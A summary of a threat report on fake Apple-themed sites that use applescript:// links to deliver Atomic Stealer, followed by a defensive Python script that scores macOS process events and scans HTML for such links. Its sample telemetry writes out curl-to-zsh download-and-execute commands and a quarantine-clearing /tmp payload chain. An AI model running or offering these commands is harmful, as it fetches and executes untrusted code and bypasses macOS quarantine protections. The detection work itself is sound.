Overview
- Jamf Threat Labs, which published findings Wednesday, said active fake Apple-themed sites use applescript:// links to open Script Editor with code preloaded.
- The lure poses as a storage cleanup guide and shows an Execute button that triggers a normal-looking browser prompt to open Script Editor.
- After the user runs it, the script starts an obfuscated curl-to-zsh chain that decodes a base64-encoded, gzip-compressed payload, writes a file in /tmp, clears its extended attributes with xattr, and executes it.
- The final payload is Atomic Stealer, which can take Keychain items, browser wallet data, autofill entries, passwords, cookies, stored credit cards, and system details.
- Routing the lure through Script Editor avoids Apple’s new Terminal paste scanning, so defenders are blocking domains such as dryvecar[.]com and urging users to treat Script Editor prompts as high risk and not to run scripts launched from web pages.
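Detection logic for the chain summarised above, added here as an example and not taken from Jamf's report: it scores constructed macOS process-execution events (a hypothetical EDR schema with `parent` and `cmd` fields) against the indicators the write-up names, refangs the reported domain for matching, decodes `echo <base64> | base64 -d` stages so an obfuscated inner command is scanned as well, and separately scans page HTML for links handed to the applescript: scheme. The event schema, the Script Editor path, the weights, the alert threshold, the `lure.example` host and every sample command line and HTML snippet are assumptions; only dryvecar[.]com comes from the report.

```python
"""Score macOS process events for the Script Editor -> curl | zsh -> base64/gzip
-> /tmp -> xattr -> execute chain, and flag applescript: links in page HTML.
Added example: schema, weights, paths and samples are assumptions."""
import base64
import re

# Defanged indicator quoted in the report; refanged only in memory for matching.
BLOCKED_DOMAINS = {"dryvecar[.]com"}
ALERT_THRESHOLD = 5  # assumption: tune against your own telemetry

# Behavioural indicators drawn from the chain the write-up describes (name, weight, pattern).
INDICATORS = [
    ("curl_to_shell", 3, re.compile(r"\bcurl\b[^|]*\|\s*(?:\S*/)?(?:zsh|bash|sh)\b")),
    ("decoded_stdin_to_shell", 2, re.compile(r"\bbase64\s+(?:-d|-D|--decode)\s*\|\s*(?:\S*/)?(?:zsh|bash|sh)\b")),
    ("base64_decode", 1, re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("gzip_decode", 1, re.compile(r"\b(?:gunzip|gzip\s+-d|zcat)\b")),
    ("writes_tmp", 1, re.compile(r"(?:>|-o)\s*/tmp/\S+")),
    ("clears_xattr", 2, re.compile(r"\bxattr\s+(?:-c|-d\s+com\.apple\.quarantine)\b")),
    ("executes_tmp", 2, re.compile(r"[;&|]\s*/tmp/\S+")),
]
WEIGHTS = {name: w for name, w, _ in INDICATORS}
WEIGHTS.update({"script_editor_parent": 3, "blocked_domain": 4})

ECHO_B64 = re.compile(r"\becho\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
APPLESCRIPT_LINK = re.compile(r"""(?:href|src|action)\s*=\s*["']?\s*(applescript:[^"'\s>]*)""", re.IGNORECASE)


def refang(domain: str) -> str:
    """Turn a defanged indicator (dryvecar[.]com) back into a matchable host name."""
    return domain.replace("[.]", ".")


def expand_base64_stages(cmd: str, depth: int = 3) -> str:
    """Append the decoded text of every `echo <b64> | base64 -d` stage so the
    hidden inner command is scanned too; the depth bound stops nested blobs."""
    text = cmd
    for _ in range(depth):
        decoded = []
        for blob in ECHO_B64.findall(text):
            try:
                decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
            except ValueError:  # binascii.Error is a ValueError: not real base64, skip it
                continue
        new = [d for d in decoded if d not in text]
        if not new:
            break
        text += "\n" + "\n".join(new)
    return text


def analyze(event: dict) -> dict:
    """Return the indicators an event matches, its weighted score and the alert verdict."""
    text = expand_base64_stages(event["cmd"])
    hits = [name for name, _, pat in INDICATORS if pat.search(text)]
    parent = event.get("parent", "")
    if "Script Editor" in parent or parent.endswith("/osascript"):
        hits.append("script_editor_parent")
    blocked_set = {refang(d) for d in BLOCKED_DOMAINS}
    blocked = sorted({h for h in URL_HOST.findall(text) if h in blocked_set})
    if blocked:
        hits.append("blocked_domain")
    score = sum(WEIGHTS[h] for h in hits)
    return {"hits": hits, "blocked_domains": blocked, "score": score,
            "alert": score >= ALERT_THRESHOLD}


def find_applescript_links(html: str) -> list:
    """Return every attribute value on a page that hands a URL to the applescript:
    scheme, so a web proxy or mail gateway can flag the page before a user clicks."""
    return APPLESCRIPT_LINK.findall(html)


# Constructed sample telemetry (not real events). The second stage hides its
# command in base64 the way the report describes the chain as obfuscated.
INNER_STAGE = ("curl -s https://lure.example/p | base64 -D | gunzip > /tmp/.a "
               "&& xattr -c /tmp/.a && /tmp/.a")
SAMPLE_EVENTS = [
    {"parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",  # benign fetch
     "cmd": "curl -fsSL https://example.org/release.json -o release.json"},
    {"parent": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
     "cmd": "/bin/sh -c 'curl -fsSL https://dryvecar.com/s | zsh'"},
    {"parent": "/bin/zsh",
     "cmd": "/bin/zsh -c 'echo %s | base64 -d | zsh'"
            % base64.b64encode(INNER_STAGE.encode()).decode()},
]
SAMPLE_HTML = """<h1>Free up storage</h1>
<a class="btn" href="https://support.example/cleanup">Learn more</a>
<a class="btn" HREF = 'applescript://example-handler?script=CONSTRUCTED'>Execute</a>"""

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev))
    print(find_applescript_links(SAMPLE_HTML))
```

The third sample alerts on behaviour alone even though its host is not on the blocklist, which is the point of scoring the chain rather than the domain: a new lure domain would still trip it. Real telemetry carries process ancestry, so the fetch stage from Script Editor and the later /tmp execution can be joined into one incident rather than scored as separate events.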